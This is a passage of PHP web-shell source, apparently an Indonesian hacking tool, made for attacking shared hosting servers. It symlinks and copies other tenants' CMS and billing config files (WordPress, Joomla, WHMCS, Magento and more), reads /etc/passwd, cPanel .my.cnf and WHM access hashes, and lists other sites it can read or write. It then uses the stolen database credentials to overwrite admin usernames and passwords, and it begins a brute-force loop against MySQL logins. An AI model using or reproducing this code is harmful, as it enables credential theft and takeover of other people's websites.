symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-Wordpress-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-Wordpress-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress-blog.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress-beta.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-Wordpress-blogs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-Wordpress-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-Wordpress-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-Wordpress-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-Wordpress-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-Wordpress-test.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostbillincludes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/app/etc/local.xml',$sitess.'-Magento.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-Opencart.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/settings.inc.php',$sitess.'-Prestashop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/lokomedia/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/slconfig.php',$sitess.'-Sitelock.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/application/config/database.php',$sitess.'-Ellislab.txt');
}
print "Location: ./\n\n";";
  634.         $file = "nb_config/vhost.cin";
  635.         $handle = fopen($file ,"w+");
  636.         fwrite($handle ,base64_decode($vhost));
  637.         fclose($handle);
  638.         chmod($file, 0755);
  639.         if(exe("cd nb_config && ./vhost.cin")) {
  640.             echo "<center><a href='$link_config/nb_config'><font color=lime>Done</font></a></center>";
  641.         } else {
  642.             echo "<center><a href='$link_config/nb_config/vhost.cin'><font color=lime>Done</font></a></center>";
  643.         }
  644.  
  645.     } else {
  646.         $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  647.         while($passwd = fgets($etc)) {
  648.             if($passwd == "" || !$etc) {
  649.                 echo "<font color=red>Can't read /etc/passwd</font>";
  650.             } else {
  651.                 preg_match_all('/(.*?):x:/', $passwd, $user_config);
  652.                 foreach($user_config[1] as $user_idx) {
  653.                     $user_config_dir = "/home/$user_idx/public_html/";
  654.                     if(is_readable($user_config_dir)) {
  655.                         $grab_config = array(
  656.                             "/home/$user_idx/.my.cnf" => "cpanel",
  657.                             "/home/$user_idx/.accesshash" => "WHM-accesshash",
  658.                             "$user_config_dir/po-content/config.php" => "Popoji",
  659.                             "$user_config_dir/vdo_config.php" => "Voodoo",
  660.                             "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  661.                             "$user_config_dir/config/koneksi.php" => "Lokomedia",
  662.                             "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  663.                             "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  664.                             "$user_config_dir/whm/configuration.php" => "WHMCS",
  665.                             "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  666.                             "$user_config_dir/forum/config.php" => "phpBB",
  667.                             "$user_config_dir/sites/default/settings.php" => "Drupal",
  668.                             "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  669.                             "$user_config_dir/app/etc/local.xml" => "Magento",
  670.                             "$user_config_dir/joomla/configuration.php" => "Joomla",
  671.                             "$user_config_dir/configuration.php" => "Joomla",
  672.                             "$user_config_dir/wp/wp-config.php" => "WordPress",
  673.                             "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  674.                             "$user_config_dir/wp-config.php" => "WordPress",
  675.                             "$user_config_dir/admin/config.php" => "OpenCart",
  676.                             "$user_config_dir/slconfig.php" => "Sitelok",
  677.                             "$user_config_dir/application/config/database.php" => "Ellislab");
  678.                         foreach($grab_config as $config => $nama_config) {
  679.                             $ambil_config = file_get_contents($config);
  680.                             if($ambil_config == '') {
  681.                             } else {
  682.                                 $file_config = fopen("nb_config/$user_idx-$nama_config.txt","w");
  683.                                 fputs($file_config,$ambil_config);
  684.                             }
  685.                         }
  686.                     }      
  687.                 }
  688.             }  
  689.         }
  690.     echo "<center><a href='?dir=$dir/nb_config'><font color=lime size=4>>> Done <<</font></a></center>";
  691.     }
  692. }  elseif($_GET['do'] == 'jumping') {
  693.     $i = 0;
  694.     echo "<div class='margin: 5px auto;'>";
  695.     if(preg_match("/hsphere/", $dir)) {
  696.         $urls = explode("\r\n", $_POST['url']);
  697.         if(isset($_POST['jump'])) {
  698.             echo "<pre>";
  699.             foreach($urls as $url) {
  700.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  701.                 $etc = "/etc/passwd";
  702.                 $f = fopen($etc,"r");
  703.                 while($gets = fgets($f)) {
  704.                     $pecah = explode(":", $gets);
  705.                     $user = $pecah[0];
  706.                     $dir_user = "/hsphere/local/home/$user";
  707.                     if(is_dir($dir_user) === true) {
  708.                         $url_user = $dir_user."/".$url;
  709.                         if(is_readable($url_user)) {
  710.                             $i++;
  711.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=#0F6516>$url_user</font></a>";
  712.                             if(is_writable($url_user)) {
  713.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=#0F6516>$url_user</font></a>";
  714.                             }
  715.                             echo $jrw."<br>";
  716.                         }
  717.                     }
  718.                 }
  719.             }
  720.         if($i == 0) {
  721.         } else {
  722.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  723.         }
  724.         echo "</pre>";
  725.         } else {
  726.             echo '<center>
  727.                  <form method="post">
  728.                  List Domains: <br>
  729.                  <textarea name="url" style="width: 500px; height: 250px;">';
  730.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  731.             while($getss = fgets($fp)) {
  732.                 echo $getss;
  733.             }
  734.             echo  '</textarea><br>
  735.                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  736.                  </form></center>';
  737.         }
  738.     } elseif(preg_match("/vhosts|vhost/", $dir)) {
  739.         preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  740.         $urls = explode("\r\n", $_POST['url']);
  741.         if(isset($_POST['jump'])) {
  742.             echo "<pre>";
  743.             foreach($urls as $url) {
  744.                 $url = str_replace("www.", "", $url);
  745.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  746.                 if(is_dir($web_vh) === true) {
  747.                     if(is_readable($web_vh)) {
  748.                         $i++;
  749.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=#0F6516>$web_vh</font></a>";
  750.                         if(is_writable($web_vh)) {
  751.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=#0F6516>$web_vh</font></a>";
  752.                         }
  753.                         echo $jrw."<br>";
  754.                     }
  755.                 }
  756.             }
  757.         if($i == 0) {
  758.         } else {
  759.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  760.         }
  761.         echo "</pre>";
  762.         } else {
  763.             echo '<center>
  764.                  <form method="post">
  765.                  List Domains: <br>
  766.                  <textarea name="url" style="width: 500px; height: 250px;">';
  767.                   bing("ip:$ip");
  768.             echo  '</textarea><br>
  769.                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  770.                  </form></center>';
  771.         }
  772.     } else {
  773.         echo "<pre>";
  774.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  775.         while($passwd = fgets($etc)) {
  776.             if($passwd == '' || !$etc) {
  777.                 echo "<font color=red>Can't read /etc/passwd</font>";
  778.             } else {
  779.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  780.                 foreach($user_jumping[1] as $user_idx_jump) {
  781.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  782.                     if(is_readable($user_jumping_dir)) {
  783.                         $i++;
  784.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=silver>$user_jumping_dir</font></a>";
  785.                         if(is_writable($user_jumping_dir)) {
  786.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=silver>$user_jumping_dir</font></a>";
  787.                         }
  788.                         echo $jrw;
  789.                         if(function_exists('posix_getpwuid')) {
  790.                             $domain_jump = file_get_contents("/etc/named.conf");  
  791.                             if($domain_jump == '') {
  792.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  793.                             } else {
  794.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  795.                                 foreach($domains_jump[1] as $dj) {
  796.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  797.                                     $user_jumping_url = $user_jumping_url['name'];
  798.                                     if($user_jumping_url == $user_idx_jump) {
  799.                                         echo " => ( <u>$dj</u> )<br>";
  800.                                         break;
  801.                                     }
  802.                                 }
  803.                             }
  804.                         } else {
  805.                             echo "<br>";
  806.                         }
  807.                     }
  808.                 }
  809.             }
  810.         }
  811.         if($i == 0) {
  812.         } else {
  813.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  814.         }
  815.         echo "</pre>";
  816.     }
  817.     echo "</div>";
  818. } elseif($_GET['do'] == 'auto_edit_user') {
  819.     if($_POST['hajar']) {
  820.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  821.             echo "username atau password harus lebih dari 6 karakter";
  822.         } else {
  823.             $user_baru = $_POST['user_baru'];
  824.             $pass_baru = md5($_POST['pass_baru']);
  825.             $conf = $_POST['config_dir'];
  826.             $scan_conf = scandir($conf);
  827.             foreach($scan_conf as $file_conf) {
  828.                 if(!is_file("$conf/$file_conf")) continue;
  829.                 $config = file_get_contents("$conf/$file_conf");
  830.                 if(preg_match("/JConfig|joomla/",$config)) {
  831.                     $dbhost = ambilkata($config,"host = '","'");
  832.                     $dbuser = ambilkata($config,"user = '","'");
  833.                     $dbpass = ambilkata($config,"password = '","'");
  834.                     $dbname = ambilkata($config,"db = '","'");
  835.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  836.                     $prefix = $dbprefix."users";
  837.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  838.                     $db = mysql_select_db($dbname);
  839.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  840.                     $result = mysql_fetch_array($q);
  841.                     $id = $result['id'];
  842.                     $site = ambilkata($config,"sitename = '","'");
  843.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  844.                     echo "Config => ".$file_conf."<br>";
  845.                     echo "CMS => Joomla<br>";
  846.                     if($site == '') {
  847.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  848.                     } else {
  849.                         echo "Sitename => $site<br>";
  850.                     }
  851.                     if(!$update OR !$conn OR !$db) {
  852.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  853.                     } else {
  854.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  855.                     }
  856.                     mysql_close($conn);
  857.                 } elseif(preg_match("/WordPress/",$config)) {
  858.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  859.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  860.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  861.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  862.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  863.                     $prefix = $dbprefix."users";
  864.                     $option = $dbprefix."options";
  865.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  866.                     $db = mysql_select_db($dbname);
  867.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  868.                     $result = mysql_fetch_array($q);
  869.                     $id = $result[ID];
  870.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  871.                     $result2 = mysql_fetch_array($q2);
  872.                     $target = $result2[option_value];
  873.                     if($target == '') {
  874.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  875.                     } else {
  876.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  877.                     }
  878.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  879.                     echo "Config => ".$file_conf."<br>";
  880.                     echo "CMS => Wordpress<br>";
  881.                     echo $url_target;
  882.                     if(!$update OR !$conn OR !$db) {
  883.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  884.                     } else {
  885.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  886.                     }
  887.                     mysql_close($conn);
  888.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  889.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  890.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  891.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  892.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  893.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  894.                     $prefix = $dbprefix."admin_user";
  895.                     $option = $dbprefix."core_config_data";
  896.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  897.                     $db = mysql_select_db($dbname);
  898.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  899.                     $result = mysql_fetch_array($q);
  900.                     $id = $result[user_id];
  901.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  902.                     $result2 = mysql_fetch_array($q2);
  903.                     $target = $result2[value];
  904.                     if($target == '') {
  905.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  906.                     } else {
  907.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  908.                     }
  909.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  910.                     echo "Config => ".$file_conf."<br>";
  911.                     echo "CMS => Magento<br>";
  912.                     echo $url_target;
  913.                     if(!$update OR !$conn OR !$db) {
  914.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  915.                     } else {
  916.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  917.                     }
  918.                     mysql_close($conn);
  919.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  920.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  921.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  922.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  923.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  924.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  925.                     $prefix = $dbprefix."user";
  926.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  927.                     $db = mysql_select_db($dbname);
  928.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  929.                     $result = mysql_fetch_array($q);
  930.                     $id = $result[user_id];
  931.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  932.                     if($target == '') {
  933.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  934.                     } else {
  935.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  936.                     }
  937.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  938.                     echo "Config => ".$file_conf."<br>";
  939.                     echo "CMS => OpenCart<br>";
  940.                     echo $url_target;
  941.                     if(!$update OR !$conn OR !$db) {
  942.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  943.                     } else {
  944.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  945.                     }
  946.                     mysql_close($conn);
  947.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  948.                     $dbhost = ambilkata($config,'server = "','"');
  949.                     $dbuser = ambilkata($config,'username = "','"');
  950.                     $dbpass = ambilkata($config,'password = "','"');
  951.                     $dbname = ambilkata($config,'database = "','"');
  952.                     $prefix = "users";
  953.                     $option = "identitas";
  954.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  955.                     $db = mysql_select_db($dbname);
  956.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  957.                     $result = mysql_fetch_array($q);
  958.                     $target = $result[alamat_website];
  959.                     if($target == '') {
  960.                         $target2 = $result[url];
  961.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  962.                         if($target2 == '') {
  963.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  964.                         } else {
  965.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  966.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  967.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  968.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  969.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  970.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  971.                             } else {
  972.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  973.                             }
  974.                         }
  975.                     } else {
  976.                         $cek_login = file_get_contents("$target/adminweb/");
  977.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  978.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  979.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  980.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  981.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  982.                         } else {
  983.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  984.                         }
  985.                     }
  986.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  987.                     echo "Config => ".$file_conf."<br>";
  988.                     echo "CMS => Lokomedia<br>";
  989.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  990.                         echo $url_target2;
  991.                     } else {
  992.                         echo $url_target;
  993.                     }
  994.                     if(!$update OR !$conn OR !$db) {
  995.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  996.                     } else {
  997.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  998.                     }
  999.                     mysql_close($conn);
  1000.                 }
  1001.             }
  1002.         }
  1003.     } else {
  1004.         echo "<center>
  1005.        <h1>Auto Edit User Config</h1>
  1006.        <form method='post'>
  1007.        DIR Config: <br>
  1008.        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1009.        Set User & Pass: <br>
  1010.        <input type='text' name='user_baru' value='n45ht123' placeholder='user_baru'><br>
  1011.        <input type='text' name='pass_baru' value='n45ht123' placeholder='pass_baru'><br>
  1012.        <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1013.        </form>
  1014.        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1015.        ";
  1016.     }
  1017. } elseif($_GET['do'] == 'cpanel') {
  1018.     if($_POST['crack']) {
  1019.         $usercp = explode("rn", $_POST['user_cp']);
  1020.         $passcp = explode("rn", $_POST['pass_cp']);
  1021.         $i = 0;
  1022.         foreach($usercp as $ucp) {
  1023.             foreach($passcp as $pcp) {
  1024.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1025.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1026.                     } else {
  1027.                         $_SESSION[$ucp] = "1";
  1028.                         $_SESSION[$pcp] = "1";
  1029.                         if($ucp == '' || $pcp == '') {
  1030.                            
  1031.                         } else {
